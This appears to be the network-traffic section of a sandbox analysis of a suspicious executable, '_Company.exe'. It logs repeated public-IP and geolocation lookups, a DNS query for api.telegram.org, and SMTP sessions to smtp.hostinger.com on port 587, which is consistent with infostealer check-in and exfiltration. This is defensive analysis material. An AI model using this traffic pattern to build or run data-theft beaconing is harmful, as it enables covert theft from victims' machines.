Dec 18, 2024 17:07:54.176423073 CET	587	49824	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:54.470879078 CET	587	49824	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:54.471097946 CET	49824	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:07:54.592400074 CET	587	49824	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:54.864589930 CET	587	49824	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:54.865397930 CET	49824	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:07:54.865509987 CET	49824	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:07:54.865534067 CET	49824	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:07:54.865567923 CET	49824	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:07:54.986905098 CET	587	49824	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:54.986955881 CET	587	49824	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:54.987077951 CET	587	49824	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:54.987086058 CET	587	49824	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:55.443845987 CET	587	49824	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:55.496449947 CET	49824	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:07:56.951675892 CET	49824	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:07:57.071408033 CET	587	49824	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:57.344615936 CET	587	49824	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:57.345166922 CET	587	49824	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:57.347497940 CET	49824	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:07:57.351270914 CET	49824	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:07:57.353251934 CET	49838	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:07:57.470809937 CET	587	49824	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:57.473062992 CET	587	49838	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:57.473136902 CET	49838	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:07:58.676038980 CET	587	49838	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:58.676296949 CET	49838	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:07:58.796112061 CET	587	49838	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:59.073887110 CET	587	49838	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:59.074214935 CET	49838	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:07:59.194103956 CET	587	49838	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:59.466568947 CET	587	49838	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:59.466753006 CET	49838	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:07:59.587817907 CET	587	49838	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:59.888154030 CET	587	49838	172.65.255.143	192.168.2.6
Dec 18, 2024 17:07:59.896745920 CET	49838	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:08:00.018733025 CET	587	49838	172.65.255.143	192.168.2.6
Dec 18, 2024 17:08:00.293081999 CET	587	49838	172.65.255.143	192.168.2.6
Dec 18, 2024 17:08:00.293371916 CET	49838	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:08:00.416122913 CET	587	49838	172.65.255.143	192.168.2.6
Dec 18, 2024 17:08:00.713082075 CET	587	49838	172.65.255.143	192.168.2.6
Dec 18, 2024 17:08:00.713325024 CET	49838	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:08:00.833029032 CET	587	49838	172.65.255.143	192.168.2.6
Dec 18, 2024 17:08:01.122169018 CET	587	49838	172.65.255.143	192.168.2.6
Dec 18, 2024 17:08:01.122567892 CET	49838	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:08:01.122633934 CET	49838	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:08:01.122633934 CET	49838	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:08:01.122653008 CET	49838	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:08:01.242607117 CET	587	49838	172.65.255.143	192.168.2.6
Dec 18, 2024 17:08:01.242621899 CET	587	49838	172.65.255.143	192.168.2.6
Dec 18, 2024 17:08:01.242634058 CET	587	49838	172.65.255.143	192.168.2.6
Dec 18, 2024 17:08:01.242765903 CET	587	49838	172.65.255.143	192.168.2.6
Dec 18, 2024 17:08:01.242835999 CET	587	49838	172.65.255.143	192.168.2.6
Dec 18, 2024 17:08:01.729691982 CET	587	49838	172.65.255.143	192.168.2.6
Dec 18, 2024 17:08:01.777751923 CET	49838	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:08:21.750197887 CET	587	49838	172.65.255.143	192.168.2.6
Dec 18, 2024 17:08:21.751617908 CET	587	49838	172.65.255.143	192.168.2.6
Dec 18, 2024 17:08:21.751682997 CET	49838	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:09:30.754642963 CET	49838	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:09:30.754714966 CET	49838	587	192.168.2.6	172.65.255.143
Dec 18, 2024 17:09:30.879154921 CET	587	49838	172.65.255.143	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 17:07:16.020653963 CET	53001	53	192.168.2.6	1.1.1.1
Dec 18, 2024 17:07:16.158549070 CET	53	53001	1.1.1.1	192.168.2.6
Dec 18, 2024 17:07:17.945643902 CET	64441	53	192.168.2.6	1.1.1.1
Dec 18, 2024 17:07:18.088179111 CET	53	64441	1.1.1.1	192.168.2.6
Dec 18, 2024 17:07:43.264695883 CET	49746	53	192.168.2.6	1.1.1.1
Dec 18, 2024 17:07:43.401937008 CET	53	49746	1.1.1.1	192.168.2.6
Dec 18, 2024 17:07:50.673345089 CET	64203	53	192.168.2.6	1.1.1.1
Dec 18, 2024 17:07:50.810703993 CET	53	64203	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 18, 2024 17:07:16.020653963 CET	192.168.2.6	1.1.1.1	0x4c35	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Dec 18, 2024 17:07:17.945643902 CET	192.168.2.6	1.1.1.1	0xc736	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Dec 18, 2024 17:07:43.264695883 CET	192.168.2.6	1.1.1.1	0xe539	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Dec 18, 2024 17:07:50.673345089 CET	192.168.2.6	1.1.1.1	0x5df6	Standard query (0)	smtp.hostinger.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 18, 2024 17:07:16.158549070 CET	1.1.1.1	192.168.2.6	0x4c35	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 18, 2024 17:07:16.158549070 CET	1.1.1.1	192.168.2.6	0x4c35	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Dec 18, 2024 17:07:16.158549070 CET	1.1.1.1	192.168.2.6	0x4c35	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Dec 18, 2024 17:07:16.158549070 CET	1.1.1.1	192.168.2.6	0x4c35	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Dec 18, 2024 17:07:16.158549070 CET	1.1.1.1	192.168.2.6	0x4c35	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Dec 18, 2024 17:07:16.158549070 CET	1.1.1.1	192.168.2.6	0x4c35	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Dec 18, 2024 17:07:18.088179111 CET	1.1.1.1	192.168.2.6	0xc736	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Dec 18, 2024 17:07:18.088179111 CET	1.1.1.1	192.168.2.6	0xc736	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Dec 18, 2024 17:07:43.401937008 CET	1.1.1.1	192.168.2.6	0xe539	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Dec 18, 2024 17:07:50.810703993 CET	1.1.1.1	192.168.2.6	0x5df6	No error (0)	smtp.hostinger.com		172.65.255.143	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49716	158.101.44.242	80	7100	C:\Users\user\Desktop\_Company.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 17:07:16.288747072 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 18, 2024 17:07:17.508570910 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 16:07:17 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 01839c44c3aafd2d084b85dbfc1bd922 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 18, 2024 17:07:17.513204098 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 18, 2024 17:07:17.904112101 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 16:07:17 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d389a24438a147dbe7d8e54b1e3ad2c6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 18, 2024 17:07:19.787808895 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 18, 2024 17:07:20.189551115 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 16:07:20 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bbd849a29bf5667037fafd5d9c68f7b5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49736	158.101.44.242	80	7100	C:\Users\user\Desktop\_Company.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 17:07:22.108946085 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 18, 2024 17:07:23.323529959 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 16:07:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 48a0f61c5bf1e27b84c837096097d690 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49747	158.101.44.242	80	7100	C:\Users\user\Desktop\_Company.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 17:07:25.142911911 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 18, 2024 17:07:26.355339050 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 16:07:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6ec967dc623cf1e19cb904b9ba320d40 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49756	158.101.44.242	80	7100	C:\Users\user\Desktop\_Company.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 17:07:28.198705912 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 18, 2024 17:07:29.409709930 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 16:07:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6c2788fcfb8ed6f39998c919bc7ebe40 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49768	158.101.44.242	80	7100	C:\Users\user\Desktop\_Company.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 17:07:31.224899054 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 18, 2024 17:07:32.433923006 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 16:07:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d97c7429d90cae8fb28a1fe94045f71f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49779	158.101.44.242	80	7100	C:\Users\user\Desktop\_Company.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 17:07:34.230876923 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 18, 2024 17:07:35.558201075 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 16:07:35 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b75f25098ffb41c4abfa95953356fe4e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49787	158.101.44.242	80	7100	C:\Users\user\Desktop\_Company.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 17:07:37.356551886 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 18, 2024 17:07:38.559560061 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 16:07:38 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 03e34034128b6b0b0e4fc896a39597f0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49796	158.101.44.242	80	7100	C:\Users\user\Desktop\_Company.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 17:07:40.352834940 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 18, 2024 17:07:41.563091040 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 16:07:41 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c58cbc53358d84508b611abaf7a6ea7a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49724	104.21.67.152	443	7100	C:\Users\user\Desktop\_Company.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 16:07:19 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-18 16:07:19 UTC	870	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 16:07:19 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 526808 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hg06MYLpGb1Q7DgAIjSWk5IHuOMjKLN07BkwEpayYOEmlqjixPLvAX1NzxFMamJNPzE11r8xPbRAZ4Ylm1EMCiUKJihPVia13KOWNgVrTpteF7YyI8rkannbxr9NE9ZSdyVVc2jY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4067bb8c1d8c05-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1967&min_rtt=1956&rtt_var=756&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1427174&cwnd=215&unsent_bytes=0&cid=46e7a2da70c549d8&ts=459&x=0"
2024-12-18 16:07:19 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49728	104.21.67.152	443	7100	C:\Users\user\Desktop\_Company.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 16:07:21 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-18 16:07:21 UTC	880	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 16:07:21 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 526810 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nZjGL3jJdznkWE4sym1ty3fB6NtiPmFYT%2Ftvrp4uU60xTlyQErAW%2FzMsdBVGtJgUigQeyDN3GMC1H%2FRSGBDk%2FZce%2FriFPqEz09kGdPpVAJbMbFR3yNpOb1199snGZmDDiXQa3hxs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4067c94a2a4310-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1579&rtt_var=607&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1781574&cwnd=242&unsent_bytes=0&cid=746b3f4208f999c6&ts=473&x=0"
2024-12-18 16:07:21 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49739	104.21.67.152	443	7100	C:\Users\user\Desktop\_Company.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 16:07:24 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-18 16:07:25 UTC	876	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 16:07:24 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 526813 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oozcmGOuMCQISFVs6yYMyBzNLt7aYu4J0r4qLj0q338UhiWyBUNv8rZK%2BK082PvoYSUN6dGq%2FbuP8Gu%2BPpUn3QFfq1M98V0EgZutV0qNUXJUDvOSFSr9Ri9XYo4V935L7SnPmpV4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4067dc4a6b7d26-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1993&min_rtt=1984&rtt_var=763&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1416100&cwnd=205&unsent_bytes=0&cid=7fca804c1775c495&ts=477&x=0"
